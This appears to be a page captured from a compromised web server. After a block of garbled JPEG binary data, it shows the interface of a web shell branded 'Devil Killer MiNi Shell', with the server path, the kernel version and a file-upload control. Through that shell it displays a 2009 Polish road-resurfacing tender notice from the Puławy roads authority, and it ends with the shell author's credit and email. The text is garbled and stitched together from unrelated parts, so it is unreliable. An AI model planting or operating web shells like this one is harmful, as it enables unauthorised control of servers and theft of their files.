JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/168780-N-2009.html

<p class="kh_header"><b>Puławy: Remont  nawierzchni drogi wojewódzkiej nr 801 Warszawa - Karczew - Wilga - Dęblin - Puławy  od km 102+645 do km 103+845  długości 1,200 km  odcinek  Stężyca - Dęblin.</b><br>
<b>Numer ogłoszenia: 168780 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie - Rejon Dróg Wojewódzkich w Puławach , ul. Składowa 1A, 24-100 Puławy, woj. lubelskie, tel. 081 8863163, 8864103, faks 081 8863163.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  nawierzchni drogi wojewódzkiej nr 801 Warszawa - Karczew - Wilga - Dęblin - Puławy  od km 102+645 do km 103+845  długości 1,200 km  odcinek  Stężyca - Dęblin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
a)	frezowanie nawierzchni bitumicznej, głęb śr. 4 cm 	- 	  1.800,00 m2 
b)	dwukrotne skropienie nawierzchni asfaltem	- 	  14.520,00 m2
c)	ułożenie warstwy wyrównawczej z betonu asfaltowego	                                         0/16 mm wg PN-S-96025/2000 grubości 4 cm	- 	   732,0  Mg
d)	ułożenie warstwy ścieralnej z betonu asfaltowego	                              0/16 mm wg PN-S-96025/2000 grubości 5 cm	- 	  7.200,00 m2                                         
e)	zatoka autobusowa z kostki brukowej betonowej                                                       gr. 8 cm Behaton szary	- 	     114,00 m2
f)	chodnik z kostki bruk. beton. gr. 6 cm Behaton rubin	- 	     153,00 m2
g)	ścieżka rowerowa z kostki jw., lecz bezfazowej	- 	     510,00 m2
h)	zjazdy publiczne i indywidualne	- 	     822,94 m2
i)	zjazdy do pól	- 	     396,22 m2
j)	umocnienie poboczy na szerokości 1,5 m                                                      kruszywem łamanym 0÷31,5	- 	  3.472,50 m2
k)	oznakowanie poziome	- 	     210,90 m2
l)	bariery ochronne stalowe	- 	     420,00 mb
m)	inwentaryzacja geodezyjna powykonawcza	- 	  1.200,00 mb

2. Szczegółowy zakres robót ujęty jest w dokumentacji projektowej, w przedmiarze robót  oraz  w Szczegółowych Specyfikacjach Technicznych.
3.Zamówienie należy wykonać zgodnie z dokumentacją techniczną oraz Szczegółowymi Specyfikacjami Technicznymi Wykonania i Odbioru Robót: D.00.00.00; D.01.00.00; D.01.01.01; D.01.02.04; D.02.00.01; D.02.01.01; D.02.03.01; D.04.01.01; 04.02.01; D.04.03.01; D.04.04.00; D.04.04.02; D.04.04.04; D.04.05.00; D.04.05.01; D.04.06.01; D.04.08.01; D.05.03.05; D.05.03.11; D.05.03.23a;  D.06.01.01; D.06.03.01; D.06.04.01; D.07.01.01; D.07.02.01;  D.07.05.01;  D.08.01.01; D.08.02.02; D.08.03.01.
4.Wykonawca jest zobowiązany do zapewnienia obsługi geodezyjnej podczas prowadzenia robót i sporządzenia powykonawczej inwentaryzacji geodezyjnej przez upoważnioną jednostkę geodezyjną zgodnie z § 19, § 20 i § 21 Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25 z 1995 r. poz. 133 z późniejszymi zmianami)
5. Wykonawca przed przystąpieniem do wykonania robót budowlanych zobowiązany jest do opracowania  harmonogramu rzeczowo - finansowego robót, PZJ (programu zapewnienia jakości) oraz planu (BIOZ) zgodnie z art. 21a ustawy z dnia 7 lipca 1994 r. (Prawo budowlane) wraz z późniejszymi zmianami, które  przed przystąpieniem do wykonywania robót winien przedłożyć do akceptacji w siedzibie RDW w Puławach.
6. Przekazanie placu budowy Wykonawcy przez Zamawiającego nastąpi                         po przedłożeniu Zamawiającemu zatwierdzonego projektu organizacji ruchu i zgłoszeniu gotowości Wykonawcy do wykonania robót. 
7. Okres gwarancji dla robót objętych zamówieniem wynosi 2 lata od daty odbioru ostatecznego.
8.   Zamawiający nie dopuszcza składania ofert częściowych.
9.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane roboty budowlane spełniają wymagania określone przez Zamawiającego (art. 30, ust. 5 ustawy PZP).Wartość zamówienia wynosi: 1 164 122,18 zł netto.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.10.00-8, 45.23.32.00-1, 45.23.32.20-7, 45.23.60.00-0, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości
30 000,00 zł. (słownie złotych: trzydzieści tysięcy 00/100)
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo
zamówień publicznych.
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW
w Lublinie w Kredyt Banku S.A. O/Lublin nr 89 1500 1520 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W przetargu mogą wziąć udział Wykonawcy, którzy udokumentują przez stosowne      
 Dokumenty lub  oświadczenia, że spełniają następujące warunki:
a)	Są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami  ustawowymi.
b)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień. 
c)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.


d)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
e)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie                    art. 24 ustawy Prawo zamówień publicznych.
f)	Akceptują warunki zawarte w niniejszej specyfikacji.

2.	Ponadto Wykonawca musi spełniać następujące warunki udziału:
1)  Dysponowanie osobą zdolna do pełnienia funkcji kierownika budowy dla branży drogowej z minimum 3 letnim doświadczeniem w pracy na stanowisku kierownika budowy/robót posiadającą uprawnienia budowlane uprawniające do kierowania robotami drogowymi  oraz aktualne zaświadczenie odpowiedniego organu samorządu zawodowego o wymaganym ubezpieczeniu od odpowiedzialności cywilnej, lub przedstawienie pisemnego  zobowiązania innego podmiotu do udostępnienia osoby posiadającej wymagane uprawnienia zdolnej do wykonania zamówienia.
2)  Wykonanie w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 roboty budowlanej odpowiadającej swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, tzn. budowa, rozbudowa lub remont drogi z podaniem daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana należycie.
3)  Dysponowanie jednostkami sprzętu i środkami transportu lub przedstawienie pisemnego zobowiązania/ń innego/ych podmiotu/ów do udostępnienia potencjału technicznego, wymienionymi  poniżej: 


LP.	
Nazwa i typ jednostki sprzętowej	Wymagana minimalna ilość sztuk
1.	Koparka 0,25 m3	1
2.	Koparka przedsiębierna 0,40 m3	1
3.	Koparka przedsiębierna 0,60 m3  	1
4.	Samochód samowyładowczy  do 5 ton 	2
5.	Samochód samowyładowczy 5-10 ton  	1
6.	Wywrotki do mas bitumicznych 5 do 10 ton	4
7.	Ciągnik siodłowy z naczepą	1
8.	Walce drogowe	3
9.	Zagęszczarki płytowe	2
10.	Ładowarka	1
11.	Rozściełacz do mas bitumicznych 	1
12.	Wytwórnia do mas bitumicznych o wydajności 100-160 Mg/h*	1
13.	Skrapiarka do bitumu	1
14.	Szczotki mechaniczne	1
15.	Sprężarka powietrza spalinowa 4-5 m3/min	1
16.	Frezarka 	1
17.	Równiarka samojezdna 74 kW (100 KM)	1
18.	Samojezdna ścinarka poboczy URM-70	1
19.	Żuraw samochodowy	1
20.	Malowarka do znakowania dróg	1

* Uwaga!
Zamawiający wymaga wskazania lokalizacji wytwórni mas bitumicznych. Lokalizacja winna spełniać warunek czasu transportu mas bitumicznych od momentu załadowania do momentu rozpoczęcia rozładunku ( do 2 godz.). W przypadku wątpliwości spełnienia 
tego warunku Zamawiający zastrzega sobie możliwość praktycznego sprawdzenia. Odległość należy liczyć od wytwórni do najdalszego miejsca robót po drogach umożliwiających przejazd samochodów o ładowności minimum 10 ton.
3.Ocena spełniania warunków, dokonywana będzie w następujący sposób: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia  spełnienia warunków udziału w postępowaniu Wykonawca załączy do oferty następujące oświadczenia lub dokumenty:

1) Oświadczenie o spełnieniu warunków art. 22 ust. 1 pkt.1-4 ustawy Prawo zamówień publicznych .
2) Dokument uprawniający Wykonawcę do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3) Wykaz minimum 1  roboty, o której mowa w pkt. V.2 ppkt.2)  zrealizowanej przez Wykonawcę  w  ostatnich 5 latach przed  wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w tym okresie  wraz z załączonymi dokumentami potwierdzającymi, że robota ta została wykonana należycie. 
4) Wykaz osób o których mowa w pkt. V.2 ppkt. 1),  przewidzianych do realizacji zamówienia   wraz z załączonymi kserokopiami odpowiednich 
uprawnień  branży drogowej, oraz  kserokopiami aktualnych zaświadczeń odpowiedniego organu samorządu zawodowego  o wymaganym ubezpieczeniu od odpowiedzialności cywilnej. W przypadku udostępnienia osoby/osób zdolnej/ych do wykonania zamówienia przez inny podmiot/y do oferty należy dołączyć pisemne zobowiązanie tego podmiotu/ów do jej/ich udostępnienia.
5) Wykaz potencjału technicznego o którym mowa w pkt. V.2 ppkt. 3 SIWZ.                       
W przypadku udostępnienia potencjału technicznego przez inny podmiot/y do oferty należy dołączyć pisemne zobowiązanie tego podmiotu/ów do jego udostępnienia.
2. Ponadto Wykonawca obowiązany jest dołączyć do oferty:

1) Dowód wniesienia wadium.
2) Ofertę przetargową (z ceną netto i z podatkiem VAT)  
z załączonym kosztorysem ofertowym  sporządzonym przez Wykonawcę na podstawie przedmiaru robót .
3) Wstępny harmonogram robót.
4) Wykaz części zamówienia, których wykonanie Wykonawca zamierza zlecić podwykonawcy .
5) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do    oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający   
   pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia 
   albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  
   publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiajacego pok. nr 11, cena materiałów przetargowych 53,00 zł brutto lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres: rdw.pulawy@zdw.lublin.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2009 godzina 08:00, miejsce: Rejon Dróg Wojewódzkich w Puławach ul. Składowa 1a; 24-100 Puławy pok. nr 12.
Otwarcie ofert w dniu 22.06.2009r. godz. 08.30 pok. nr 11..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający 
i Wykonawcy przekazują za pomocą faksu nr (0-81) 886 31 63; 886 41 03 lub drogą elektroniczną na adres e-mail: rdw.pulawy@zdw.lublin.pl
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną , każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.

Osoby uprawnione do porozumiewania się z wykonawcami. 
1.  W sprawach technicznych - inż. Zdzisław Minda, tel. ( 0-81) 886-31-63
2.  W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Artur Wiak, tel. (0-81) 886-31-63
UWAGA: 
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są o przesłanie krótkiej informacji faksem nr (0-81) 886 31 63; 886 41 03  lub pocztą elektroniczną na adres: e-mail: rdw.pulawy@zdw.lublin.pl  zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej).

Creat By MiNi SheLL
Email: jattceo@gmail.com